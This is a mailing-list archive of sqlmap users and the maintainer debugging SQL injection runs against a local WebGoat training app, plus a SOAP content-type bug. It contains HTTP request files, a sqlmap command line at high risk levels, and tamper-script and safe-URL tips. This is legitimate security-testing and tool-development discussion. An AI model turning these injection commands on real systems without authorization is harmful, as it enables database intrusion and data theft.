Yes, I can, but it will have to be when I get home this evening. FWIW, I am interacting with the sqlmap API, so not passing it a request file. I am building the SOAP XML programmatically, then setting it as the 'data' in the options (along with headers to specify text/xml and SOAPAction), with skipUrlEncode. On Mon, Oct 19, 2015 at 9:02 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > But sqlmap should automatically skip the url encoding of such request > bodies if the content-type has been set to the proper value from start (or > if there was no content-type from the beginning). > > Can you please send a sample request file and/or used sqlmap options. > > Bye > > On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry <bpe...@gm...> > wrote: > >> The actual request is a SOAP payload, which requires a content type of >> XML, and no URL encoding (which, if performed, returns a 50x). >> >> On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Hi Brandon. >>> >>> Sorry for late reply. It goes like this. >>> >>> Your header value for content-type should be propagated/used, even in >>> this case, in all cases THAN one. >>> >>> If you use --skip-urlencode and you (or your request file) state that >>> the content-type should be "urlencoded" sqlmap forces switch to either the >>> "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've >>> pinpointed will be triggered only in described situation. >>> >>> Can you please describe what are you trying to accomplish? I believe >>> that you are trying to leave some parts (non-payload) url encoded, while >>> you want payload to not be url encoded. >>> >>> Bye >>> >>> On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> Will patch it later today. >>>> >>>> Bye >>>> On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> >>>> wrote: >>>> >>>>> I tracked it down to ./lib/request/connect.py, line 726. >>>>> >>>>> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >>>>> PLAIN_TEXT_CONTENT_TYPE) >>>>> >>>>> I am specifying a content type explicitly with —headers, so commenting >>>>> this line out allowed sqlmap to detect the injections (the server returns >>>>> 50x if the content type isn't right). >>>>> >>>>> Not sure what the correct solution is to this, as I understand the >>>>> intent. Would this be more useful as a github issue? >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-10-19 14:02:39
|
Hi. But sqlmap should automatically skip the url encoding of such request bodies if the content-type has been set to the proper value from start (or if there was no content-type from the beginning). Can you please send a sample request file and/or used sqlmap options. Bye On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry <bpe...@gm...> wrote: > The actual request is a SOAP payload, which requires a content type of > XML, and no URL encoding (which, if performed, returns a 50x). > > On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi Brandon. >> >> Sorry for late reply. It goes like this. >> >> Your header value for content-type should be propagated/used, even in >> this case, in all cases THAN one. >> >> If you use --skip-urlencode and you (or your request file) state that the >> content-type should be "urlencoded" sqlmap forces switch to either the >> "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've >> pinpointed will be triggered only in described situation. >> >> Can you please describe what are you trying to accomplish? I believe that >> you are trying to leave some parts (non-payload) url encoded, while you >> want payload to not be url encoded. >> >> Bye >> >> On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Will patch it later today. >>> >>> Bye >>> On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> >>> wrote: >>> >>>> I tracked it down to ./lib/request/connect.py, line 726. >>>> >>>> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >>>> PLAIN_TEXT_CONTENT_TYPE) >>>> >>>> I am specifying a content type explicitly with —headers, so commenting >>>> this line out allowed sqlmap to detect the injections (the server returns >>>> 50x if the content type isn't right). >>>> >>>> Not sure what the correct solution is to this, as I understand the >>>> intent. Would this be more useful as a github issue? >>>> >>>> ------------------------------------------------------------------------------ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2015-10-19 14:00:09
|
The actual request is a SOAP payload, which requires a content type of XML, and no URL encoding (which, if performed, returns a 50x). On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi Brandon. > > Sorry for late reply. It goes like this. > > Your header value for content-type should be propagated/used, even in this > case, in all cases THAN one. > > If you use --skip-urlencode and you (or your request file) state that the > content-type should be "urlencoded" sqlmap forces switch to either the > "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've > pinpointed will be triggered only in described situation. > > Can you please describe what are you trying to accomplish? I believe that > you are trying to leave some parts (non-payload) url encoded, while you > want payload to not be url encoded. > > Bye > > On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Will patch it later today. >> >> Bye >> On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> wrote: >> >>> I tracked it down to ./lib/request/connect.py, line 726. >>> >>> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >>> PLAIN_TEXT_CONTENT_TYPE) >>> >>> I am specifying a content type explicitly with —headers, so commenting >>> this line out allowed sqlmap to detect the injections (the server returns >>> 50x if the content type isn't right). >>> >>> Not sure what the correct solution is to this, as I understand the >>> intent. Would this be more useful as a github issue? >>> >>> ------------------------------------------------------------------------------ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-10-19 11:37:21
|
Hi Brandon. Sorry for late reply. It goes like this. Your header value for content-type should be propagated/used, even in this case, in all cases THAN one. If you use --skip-urlencode and you (or your request file) state that the content-type should be "urlencoded" sqlmap forces switch to either the "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've pinpointed will be triggered only in described situation. Can you please describe what are you trying to accomplish? I believe that you are trying to leave some parts (non-payload) url encoded, while you want payload to not be url encoded. Bye On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < mir...@gm...> wrote: > Will patch it later today. > > Bye > On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> wrote: > >> I tracked it down to ./lib/request/connect.py, line 726. >> >> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >> PLAIN_TEXT_CONTENT_TYPE) >> >> I am specifying a content type explicitly with —headers, so commenting >> this line out allowed sqlmap to detect the injections (the server returns >> 50x if the content type isn't right). >> >> Not sure what the correct solution is to this, as I understand the >> intent. Would this be more useful as a github issue? >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2015-10-18 09:35:51
|
Will patch it later today. Bye On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> wrote: > I tracked it down to ./lib/request/connect.py, line 726. > > contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, > PLAIN_TEXT_CONTENT_TYPE) > > I am specifying a content type explicitly with —headers, so commenting > this line out allowed sqlmap to detect the injections (the server returns > 50x if the content type isn't right). > > Not sure what the correct solution is to this, as I understand the intent. > Would this be more useful as a github issue? > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Brandon P. <bpe...@gm...> - 2015-10-17 02:32:17
|
I tracked it down to ./lib/request/connect.py, line 726. contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) I am specifying a content type explicitly with —headers, so commenting this line out allowed sqlmap to detect the injections (the server returns 50x if the content type isn't right). Not sure what the correct solution is to this, as I understand the intent. Would this be more useful as a github issue? |
|
From: Vojtěch P. <kr...@gm...> - 2015-10-14 09:17:33
|
Hi, continuing using Sqlmap from Windows machine, now I am able to get everything without garbled characters and even without using safe url. Vojta Dne 13.10.2015 v 21:14 Miroslav Stampar napsal(a): > > Problem is that request/responses are slow. Can't see why is this > happening. > > Can you please send also the traffic.txt (-t traffic.txt) for such run? > > I don't have a clue why a simple connection test takes this slow. > > Bye > > On Oct 13, 2015 9:12 PM, "Brandon Perry" <bpe...@gm... > <mailto:bpe...@gm...>> wrote: > > Nothing looks wrong in that pastebin? It retrieved the username of > SA just fine it seems. No garbled text is in the output. > > What were you expecting to happen? > > On Tue, Oct 13, 2015 at 2:08 PM, Vojtěch Polášek > <kr...@gm... <mailto:kr...@gm...>> wrote: > > Hi, > http://pastebin.com/Q9RKsffG > I am running Arch Linux 64 bit and I am running Webgoat from > the single jar file. > I am using OpenJDK. > Thank you, > Vojta > > Dne 13.10.2015 v 18:54 Miroslav Stampar napsal(a): >> >> Yup. The master branch is a good branch. >> >> And you are having difficulties even if you use a >> --flush-session along with switches/options I've used? >> >> This is strange. I've run this numerous times in last few days. >> >> Can you please send a complete console output as I've sent >> for my runs? Also, on which OS do you run WebGoat? >> >> Bye >> >> On Oct 13, 2015 6:50 PM, "Vojtěch Polášek" <kr...@gm... >> <mailto:kr...@gm...>> wrote: >> >> Greetings, >> now it works but... >> I don't know what am I doing wrong, but it takes very >> looong time for Sqlmap to finish this run. In your >> output, it takes several seconds, for me it takes almost >> a hour to get this done. >> Also I found out that if I try to use --keep-alive, it is >> much faster, it takes about a minute, but it again >> returns garbled characters. No other optimization >> switches improve the speed. >> I am using same arguments as you, but from enumeration >> arguments I am using just --current-user, no --dump, >> --dbs etc. >> Just to be sure, I am pulling from Master branch, is this >> correct? >> Thank you very much for your efford, >> Vojtěch Polášek >> >> >> Dne 13.10.2015 v 13:07 Miroslav Stampar napsal(a): >>> Hi. >>> >>> There has been a lot work here. Please update to the >>> latest revision and retry it again. >>> >>> One word of advice regarding WebGoat. It has a bad >>> routine that automatically closes the SQLi after it >>> finds certain keywords in requests. Basically, >>> afterwards it just says "* Congratulations. You have >>> successfully completed this lesson." and prevents >>> further injection. Hence, you'll need to use --safe-url >>> and --safe-freq to reset those. Please find details >>> further in pastebin links. >>> >>> Here you can find couple of different runs: >>> >>> --technique=B >>> http://pastebin.com/04z2x00S >>> >>> (no technique constraints) >>> http://pastebin.com/UhGQLyTp >>> >>> Bye >>> >>> On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar >>> <mir...@gm... >>> <mailto:mir...@gm...>> wrote: >>> >>> Hi. >>> >>> There is still more work here to be done. Will let >>> you know. I am going to try to finish it today. >>> >>> Bye >>> >>> On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek >>> <kr...@gm... <mailto:kr...@gm...>> wrote: >>> >>> Greetings, >>> I have still problems exploiting HSQL databases. >>> current-user is still returning garbled >>> characters etc. >>> Is it still working for you? >>> Thanks, >>> Vojta >>> >>> Dne 10.10.2015 v 01:35 Miroslav Stampar napsal(a): >>>> >>>> I've used that same request file without any >>>> problems (with latest patches/revision). Will >>>> retest tomorrow. Please retry everything with >>>> --flush-session >>>> >>>> Bye >>>> >>>> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" >>>> <kr...@gm... <mailto:kr...@gm...>> >>>> wrote: >>>> >>>> Greetings, >>>> thanks for your prompt response. >>>> Unfortunatelly, it is still not working as >>>> expected. >>>> There is problem with retrieving of current >>>> user and information from HSQL database in >>>> general. >>>> Moreover, when using following request file >>>> from the same application, Sqlmap >>>> identified backend database as Postgresql >>>> instead of HSQL. >>>> This request is from lesson about simple >>>> string SQL injection >>>> #begin request file >>>> POST /WebGoat/attack?Screen=36&menu=1100 >>>> HTTP/1.1 >>>> Host: localhost:8080 >>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; >>>> rv:39.0) Gecko/20100101 Firefox/39.0 >>>> Accept: */* >>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3 >>>> Accept-Encoding: gzip, deflate >>>> Content-Type: >>>> application/x-www-form-urlencoded; >>>> charset=UTF-8 >>>> X-Requested-With: XMLHttpRequest >>>> Referer: >>>> http://localhost:8080/WebGoat/start.mvc >>>> Content-Length: 29 >>>> Connection: keep-alive >>>> Pragma: no-cache >>>> Cache-Control: no-cache >>>> Cookie: JSESSIONID=valid_cookie >>>> >>>> account_name=Smith&SUBMIT=Go! >>>> #end request >>>> Feel free to ask me for more debugging >>>> information, I will be glad to help you. >>>> Thanks for your work, >>>> Vojta >>>> Dne 9.10.2015 v 16:52 Miroslav Stampar >>>> napsal(a): >>>>> Fixed tons of bugs and pushed. Please >>>>> retry it again. >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav >>>>> Stampar <mir...@gm... >>>>> <mailto:mir...@gm...>> wrote: >>>>> >>>>> Please wait a bit. There are tons of >>>>> bugs for HSQLDB in sqlmap. On it right >>>>> now. >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 2:20 PM, >>>>> Miroslav Stampar >>>>> <mir...@gm... >>>>> <mailto:mir...@gm...>> >>>>> wrote: >>>>> >>>>> Hi again. >>>>> >>>>> Please update to the latest >>>>> revision and retry it again (with >>>>> --flush-session). >>>>> >>>>> Backend used is HSQLDB while the >>>>> sqlmap wrongly recognized it as >>>>> MySQL (because HSQLDB is MySQL >>>>> look-alike) >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 12:49 PM, >>>>> Vojtěch Polášek <kr...@gm... >>>>> <mailto:kr...@gm...>> wrote: >>>>> >>>>> Hi, >>>>> You can download Webgoat here: >>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar >>>>> Just run java- jar >>>>> WebGoat-6.0.1-war-exec.jar >>>>> And you can login at >>>>> localhost:8080/WebGoat with >>>>> name webgoat and password webgoat >>>>> The request file posted >>>>> earlier is from Blind numeric >>>>> SQL injection lesson. >>>>> Application is written in Java >>>>> and runs on embedded Tomcat 7 >>>>> server. >>>>> I am using this command, where >>>>> "request" is request file >>>>> posted earlier and >>>>> valid_cookie is simply valid >>>>> cookie. >>>>> python2 /opt/sqlmap/sqlmap.py >>>>> -r request --level=5 --risk=3 >>>>> -o >>>>> --cookie="JSESSIONID=valid_cookie' >>>>> -v3 >>>>> As I stated earlier, sqlmap >>>>> finds the vulnerability but >>>>> can't exploit it, I tried >>>>> almost all tamper scripts, >>>>> even some combinations, but no >>>>> success. >>>>> I wanted to show exploitation >>>>> of Webgoat, because I would >>>>> like to use Sqlmap for testing >>>>> of commercial application >>>>> which is based on similar >>>>> technologies. >>>>> Thank you, >>>>> Vojta >>>>> >>>>> >>>>> Dne 9.10.2015 v 11:16 Miroslav >>>>> Stampar napsal(a): >>>>>> Hi. >>>>>> >>>>>> Can you please send a used >>>>>> sqlmap command along with the >>>>>> basic info on vulnerable >>>>>> environment (e.g. just a >>>>>> plain Webgoat, URL this and >>>>>> that)? >>>>>> >>>>>> Bye >>>>>> >>>>>> On Thu, Oct 8, 2015 at 10:52 >>>>>> PM, Vojtěch Polášek >>>>>> <kr...@gm... >>>>>> <mailto:kr...@gm...>> >>>>>> wrote: >>>>>> >>>>>> Greetings, >>>>>> I am running Webgoat from >>>>>> standalone jar file, so I >>>>>> can't see any logs. >>>>>> I will try to see some >>>>>> logs from inside the >>>>>> application. Anyway, I >>>>>> didn't expect this >>>>>> application to contain >>>>>> any kind of filtering. >>>>>> I hope to show Sqlmap in >>>>>> action to some people >>>>>> from a large company and >>>>>> I wanted to use something >>>>>> simple, therefore I am >>>>>> quite surprised. I have >>>>>> never seen this situation >>>>>> - found injection but no >>>>>> possibility of >>>>>> exploitation. >>>>>> The between tamper script >>>>>> didn't help. >>>>>> Any suggestions are welcomed. >>>>>> Thanks, >>>>>> Vojta >>>>>> >>>>>> Dne 8.10.2015 v 18:10 >>>>>> Brandon Perry napsal(a): >>>>>> > You should look in the >>>>>> logs of the web server >>>>>> and see what they say. >>>>>> > >>>>>> > I bet you need >>>>>> --tamper=between >>>>>> > >>>>>> > Sent from a phone >>>>>> > >>>>>> >> On Oct 8, 2015, at >>>>>> 10:33 AM, Vojtěch Polášek >>>>>> <kr...@gm... >>>>>> <mailto:kr...@gm...>> >>>>>> wrote: >>>>>> >> >>>>>> >> Greetings, >>>>>> >> I tried to verify >>>>>> Sqlmap's functionality by >>>>>> running it against Webgoat >>>>>> >> version 6.0.1. You can >>>>>> try it your self by using >>>>>> following request file. >>>>>> >> Just log in and >>>>>> replace cookie by valid one. >>>>>> >> ###start request file >>>>>> >> POST >>>>>> /WebGoat/attack?Screen=4&menu=1100 >>>>>> HTTP/1.1 >>>>>> >> Host: localhost:8080 >>>>>> >> User-Agent: >>>>>> Mozilla/5.0 (X11; Linux >>>>>> x86_64; rv:41.0) >>>>>> Gecko/20100101 >>>>>> >> Firefox/41.0 >>>>>> >> Accept: */* >>>>>> >> Accept-Language: >>>>>> cs,en-US;q=0.7,en;q=0.3 >>>>>> >> Accept-Encoding: gzip, >>>>>> deflate >>>>>> >> Content-Type: >>>>>> application/x-www-form-urlencoded; >>>>>> charset=UTF-8 >>>>>> >> X-Requested-With: >>>>>> XMLHttpRequest >>>>>> >> Referer: >>>>>> http://localhost:8080/WebGoat/start.mvc >>>>>> >> Content-Length: 29 >>>>>> >> Cookie: JSESSIONID=replace >>>>>> >> Connection: keep-alive >>>>>> >> Pragma: no-cache >>>>>> >> Cache-Control: no-cache >>>>>> >> >>>>>> >> >>>>>> account_number=101&SUBMIT=Go! >>>>>> >> #end request file >>>>>> >> I am running git >>>>>> master of Sqlmap. >>>>>> >> Sqlmap detects SQL >>>>>> injection (boolean based >>>>>> blind Mysql), but no >>>>>> >> information gathering >>>>>> commands work (--dbs, >>>>>> --current-user...). I tried >>>>>> >> running with --hex or >>>>>> --no-cast, but no luck. >>>>>> >> What might be the problem? >>>>>> >> Thanks, >>>>>> >> Vojta >>>>>> >> >>>>>> >> >>>>>> ------------------------------------------------------------------------------ >>>>>> >> >>>>>> _______________________________________________ >>>>>> >> sqlmap-users mailing list >>>>>> >> >>>>>> sql...@li... >>>>>> <mailto:sql...@li...> >>>>>> >> >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> <mailto:sql...@li...> >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> <mailto:sql...@li...> >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> <mailto:sql...@li...> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> ------------------------------------------------------------------------------ >>> >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> <mailto:sql...@li...> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Vojtěch P. <kr...@gm...> - 2015-10-14 08:10:00
|
Hi, I have several interesting findings. I have to run Sqlmap on my Windows machine because of my presentation. So current setup is like this: Webgoat running on my physical Arch Linux box with OpenJDK. Sqlmap running on Windows 7 64 bit in virtual machine virtualized with Virtualbox. Sqlmap connects to Webgoat through Virtualbox host-only network. I don't experience any delays when running in this setup. I can even retrieve some information like current user or list of dbss without safe url. But I am getting malformed results when trying to get list of tables, even with safe url. I will send you another traffic file. Thinking about that delay, I came upon an idea that name translation may slow down my Sqlmap running on Linux. I modified my request file to use 127.0.0.1 instead of localhost. Now it is really fast, but it can't detect the injection point :-D I am getting really confused now. So I will send you traffic file from my Windows host and also from my Linux host when using IP address instead of localhost. Is that ok for you? Thank you very much, Vojta Dne 13.10.2015 v 21:14 Miroslav Stampar napsal(a): > > Problem is that request/responses are slow. Can't see why is this > happening. > > Can you please send also the traffic.txt (-t traffic.txt) for such run? > > I don't have a clue why a simple connection test takes this slow. > > Bye > > On Oct 13, 2015 9:12 PM, "Brandon Perry" <bpe...@gm... > <mailto:bpe...@gm...>> wrote: > > Nothing looks wrong in that pastebin? It retrieved the username of > SA just fine it seems. No garbled text is in the output. > > What were you expecting to happen? > > On Tue, Oct 13, 2015 at 2:08 PM, Vojtěch Polášek > <kr...@gm... <mailto:kr...@gm...>> wrote: > > Hi, > http://pastebin.com/Q9RKsffG > I am running Arch Linux 64 bit and I am running Webgoat from > the single jar file. > I am using OpenJDK. > Thank you, > Vojta > > Dne 13.10.2015 v 18:54 Miroslav Stampar napsal(a): >> >> Yup. The master branch is a good branch. >> >> And you are having difficulties even if you use a >> --flush-session along with switches/options I've used? >> >> This is strange. I've run this numerous times in last few days. >> >> Can you please send a complete console output as I've sent >> for my runs? Also, on which OS do you run WebGoat? >> >> Bye >> >> On Oct 13, 2015 6:50 PM, "Vojtěch Polášek" <kr...@gm... >> <mailto:kr...@gm...>> wrote: >> >> Greetings, >> now it works but... >> I don't know what am I doing wrong, but it takes very >> looong time for Sqlmap to finish this run. In your >> output, it takes several seconds, for me it takes almost >> a hour to get this done. >> Also I found out that if I try to use --keep-alive, it is >> much faster, it takes about a minute, but it again >> returns garbled characters. No other optimization >> switches improve the speed. >> I am using same arguments as you, but from enumeration >> arguments I am using just --current-user, no --dump, >> --dbs etc. >> Just to be sure, I am pulling from Master branch, is this >> correct? >> Thank you very much for your efford, >> Vojtěch Polášek >> >> >> Dne 13.10.2015 v 13:07 Miroslav Stampar napsal(a): >>> Hi. >>> >>> There has been a lot work here. Please update to the >>> latest revision and retry it again. >>> >>> One word of advice regarding WebGoat. It has a bad >>> routine that automatically closes the SQLi after it >>> finds certain keywords in requests. Basically, >>> afterwards it just says "* Congratulations. You have >>> successfully completed this lesson." and prevents >>> further injection. Hence, you'll need to use --safe-url >>> and --safe-freq to reset those. Please find details >>> further in pastebin links. >>> >>> Here you can find couple of different runs: >>> >>> --technique=B >>> http://pastebin.com/04z2x00S >>> >>> (no technique constraints) >>> http://pastebin.com/UhGQLyTp >>> >>> Bye >>> >>> On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar >>> <mir...@gm... >>> <mailto:mir...@gm...>> wrote: >>> >>> Hi. >>> >>> There is still more work here to be done. Will let >>> you know. I am going to try to finish it today. >>> >>> Bye >>> >>> On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek >>> <kr...@gm... <mailto:kr...@gm...>> wrote: >>> >>> Greetings, >>> I have still problems exploiting HSQL databases. >>> current-user is still returning garbled >>> characters etc. >>> Is it still working for you? >>> Thanks, >>> Vojta >>> >>> Dne 10.10.2015 v 01:35 Miroslav Stampar napsal(a): >>>> >>>> I've used that same request file without any >>>> problems (with latest patches/revision). Will >>>> retest tomorrow. Please retry everything with >>>> --flush-session >>>> >>>> Bye >>>> >>>> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" >>>> <kr...@gm... <mailto:kr...@gm...>> >>>> wrote: >>>> >>>> Greetings, >>>> thanks for your prompt response. >>>> Unfortunatelly, it is still not working as >>>> expected. >>>> There is problem with retrieving of current >>>> user and information from HSQL database in >>>> general. >>>> Moreover, when using following request file >>>> from the same application, Sqlmap >>>> identified backend database as Postgresql >>>> instead of HSQL. >>>> This request is from lesson about simple >>>> string SQL injection >>>> #begin request file >>>> POST /WebGoat/attack?Screen=36&menu=1100 >>>> HTTP/1.1 >>>> Host: localhost:8080 >>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; >>>> rv:39.0) Gecko/20100101 Firefox/39.0 >>>> Accept: */* >>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3 >>>> Accept-Encoding: gzip, deflate >>>> Content-Type: >>>> application/x-www-form-urlencoded; >>>> charset=UTF-8 >>>> X-Requested-With: XMLHttpRequest >>>> Referer: >>>> http://localhost:8080/WebGoat/start.mvc >>>> Content-Length: 29 >>>> Connection: keep-alive >>>> Pragma: no-cache >>>> Cache-Control: no-cache >>>> Cookie: JSESSIONID=valid_cookie >>>> >>>> account_name=Smith&SUBMIT=Go! >>>> #end request >>>> Feel free to ask me for more debugging >>>> information, I will be glad to help you. >>>> Thanks for your work, >>>> Vojta >>>> Dne 9.10.2015 v 16:52 Miroslav Stampar >>>> napsal(a): >>>>> Fixed tons of bugs and pushed. Please >>>>> retry it again. >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav >>>>> Stampar <mir...@gm... >>>>> <mailto:mir...@gm...>> wrote: >>>>> >>>>> Please wait a bit. There are tons of >>>>> bugs for HSQLDB in sqlmap. On it right >>>>> now. >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 2:20 PM, >>>>> Miroslav Stampar >>>>> <mir...@gm... >>>>> <mailto:mir...@gm...>> >>>>> wrote: >>>>> >>>>> Hi again. >>>>> >>>>> Please update to the latest >>>>> revision and retry it again (with >>>>> --flush-session). >>>>> >>>>> Backend used is HSQLDB while the >>>>> sqlmap wrongly recognized it as >>>>> MySQL (because HSQLDB is MySQL >>>>> look-alike) >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 12:49 PM, >>>>> Vojtěch Polášek <kr...@gm... >>>>> <mailto:kr...@gm...>> wrote: >>>>> >>>>> Hi, >>>>> You can download Webgoat here: >>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar >>>>> Just run java- jar >>>>> WebGoat-6.0.1-war-exec.jar >>>>> And you can login at >>>>> localhost:8080/WebGoat with >>>>> name webgoat and password webgoat >>>>> The request file posted >>>>> earlier is from Blind numeric >>>>> SQL injection lesson. >>>>> Application is written in Java >>>>> and runs on embedded Tomcat 7 >>>>> server. >>>>> I am using this command, where >>>>> "request" is request file >>>>> posted earlier and >>>>> valid_cookie is simply valid >>>>> cookie. >>>>> python2 /opt/sqlmap/sqlmap.py >>>>> -r request --level=5 --risk=3 >>>>> -o >>>>> --cookie="JSESSIONID=valid_cookie' >>>>> -v3 >>>>> As I stated earlier, sqlmap >>>>> finds the vulnerability but >>>>> can't exploit it, I tried >>>>> almost all tamper scripts, >>>>> even some combinations, but no >>>>> success. >>>>> I wanted to show exploitation >>>>> of Webgoat, because I would >>>>> like to use Sqlmap for testing >>>>> of commercial application >>>>> which is based on similar >>>>> technologies. >>>>> Thank you, >>>>> Vojta >>>>> >>>>> >>>>> Dne 9.10.2015 v 11:16 Miroslav >>>>> Stampar napsal(a): >>>>>> Hi. >>>>>> >>>>>> Can you please send a used >>>>>> sqlmap command along with the >>>>>> basic info on vulnerable >>>>>> environment (e.g. just a >>>>>> plain Webgoat, URL this and >>>>>> that)? >>>>>> >>>>>> Bye >>>>>> >>>>>> On Thu, Oct 8, 2015 at 10:52 >>>>>> PM, Vojtěch Polášek >>>>>> <kr...@gm... >>>>>> <mailto:kr...@gm...>> >>>>>> wrote: >>>>>> >>>>>> Greetings, >>>>>> I am running Webgoat from >>>>>> standalone jar file, so I >>>>>> can't see any logs. >>>>>> I will try to see some >>>>>> logs from inside the >>>>>> application. Anyway, I >>>>>> didn't expect this >>>>>> application to contain >>>>>> any kind of filtering. >>>>>> I hope to show Sqlmap in >>>>>> action to some people >>>>>> from a large company and >>>>>> I wanted to use something >>>>>> simple, therefore I am >>>>>> quite surprised. I have >>>>>> never seen this situation >>>>>> - found injection but no >>>>>> possibility of >>>>>> exploitation. >>>>>> The between tamper script >>>>>> didn't help. >>>>>> Any suggestions are welcomed. >>>>>> Thanks, >>>>>> Vojta >>>>>> >>>>>> Dne 